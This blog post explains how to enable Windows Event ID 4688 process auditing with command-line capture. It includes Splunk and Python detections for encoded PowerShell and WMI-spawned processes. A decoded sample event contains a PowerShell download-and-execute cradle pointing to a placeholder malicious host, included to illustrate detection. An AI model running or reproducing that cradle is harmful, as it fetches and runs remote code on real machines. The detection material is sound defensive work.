Event ID 4688 and Why Process Auditing Matters More Than You Think

23 December 2025 | 2 min read | justruss.tech

Windows Security Event ID 4688 logs process creation. Without command line logging enabled, it records that a process ran but not what arguments it was called with. The difference in investigation value between those two states is enormous.

Enabling command line logging

Two separate settings need to be configured. First, enable Audit Process Creation via Group Policy:

Computer Configuration > Windows Settings > Security Settings >
Advanced Audit Policy Configuration > Detailed Tracking >
Audit Process Creation: Success

Second, enable command line capture via registry:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f

Both are required. With only the audit policy and not the registry key, 4688 events are generated but the ProcessCommandLine field is empty. Verify both are active:

auditpol /get /subcategory:"Process Creation"
# Process Creation    Success

reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled
# ProcessCreationIncludeCmdLine_Enabled    REG_DWORD    0x1

What the event looks like with command line enabled

Log Name:    Security
Event ID:    4688

New Process Name:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line:
  powershell.exe -NonInteractive -NoProfile -EncodedCommand
  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA...

Decoding that base64:

echo "SQBFAFgA..." | base64 -d | iconv -f utf-16le -t utf-8
# IEX (New-Object Net.WebClient).DownloadString('https://malicious.example/payload')

Splunk detection queries

Suspicious encoded PowerShell:

index=wineventlog EventCode=4688
  (Process_Command_Line="*-EncodedCommand*" OR Process_Command_Line="*-enc *")
| rex field=Process_Command_Line "(?i)-e(?:nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{20,})"
| eval decoded=base64decode(b64)
| table _time, host, Account_Name, Process_Command_Line, decoded
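The decoding step and the encoded-PowerShell query above, as an added Python example that is not from the original post: it applies the same flag regex to constructed 4688 command lines, then undoes both the base64 and the UTF-16LE layer (the job iconv does in the shell one-liner above), and returns None for a clipped blob instead of failing. Record field names and sample values are assumptions.

```python
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so capture the flag text and the base64 blob after it, like the Splunk rex above.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{20,})")

def find_encoded_command(cmd: str):
    """Return the base64 argument of an -EncodedCommand flag, or None."""
    for m in ENC_FLAG.finditer(cmd):
        flag, b64 = m.group(1).lower(), m.group(2)
        if "encodedcommand".startswith(flag):  # rejects e.g. -ExecutionPolicy
            return b64
    return None

def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 over UTF-16LE text, so both layers are
    undone here; a plain base64 decode leaves a NUL after every character."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # non-base64 or truncated argument (e.g. a clipped log line)

def triage(events):
    """Records carrying an encoded command, plus the decoded script (the Splunk eval step)."""
    hits = []
    for ev in events:
        b64 = find_encoded_command(ev["cmd"])
        if b64 is not None:
            hits.append({**ev, "decoded": decode_encoded_command(b64)})
    return hits

def _enc(script: str) -> str:
    # Build an -EncodedCommand argument the way PowerShell expects it.
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed 4688 command lines (not from the original post); the encoded
# scripts are harmless strings built with _enc so the sample runs offline.
SAMPLE_EVENTS = [
    {"host": "WS01", "account": "alice", "cmd": "powershell.exe -NonInteractive "
     "-NoProfile -EncodedCommand " + _enc("Get-Date; Write-Output 'test'")},
    {"host": "WS02", "account": "bob",
     "cmd": "powershell.exe -ep Bypass -enc " + _enc("Get-Process | Select-Object Name")},
    {"host": "WS03", "account": "svc_backup",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    # Clipped blob: 36 base64 chars decode cleanly but to an odd byte count.
    {"host": "WS04", "account": "carol",
     "cmd": "powershell.exe -e " + _enc("Get-ChildItem C:\\Users")[:36]},
]
```

Calling triage(SAMPLE_EVENTS) returns the WS01, WS02 and WS04 records; the first two carry the recovered script and the clipped one carries None, which is the case to surface rather than drop in a real pipeline.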

WMI spawning child processes:

index=wineventlog EventCode=4688
  Creator_Process_Name IN ("*\\WmiPrvSE.exe", "*\\wmiprvse.exe")
  NOT New_Process_Name IN ("*\\WmiPrvSE.exe", "*\\conhost.exe")
| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line

Storage volume

On an average enterprise workstation generating around 200 process creation events per hour, Event ID 4688 with command line logging adds roughly 15-25 MB of raw event data per day per endpoint. At 1,000 endpoints, budget approximately 5-8 GB per day after SIEM compression and indexing. The storage cost is much lower than the investigation cost of not having this data when you need it.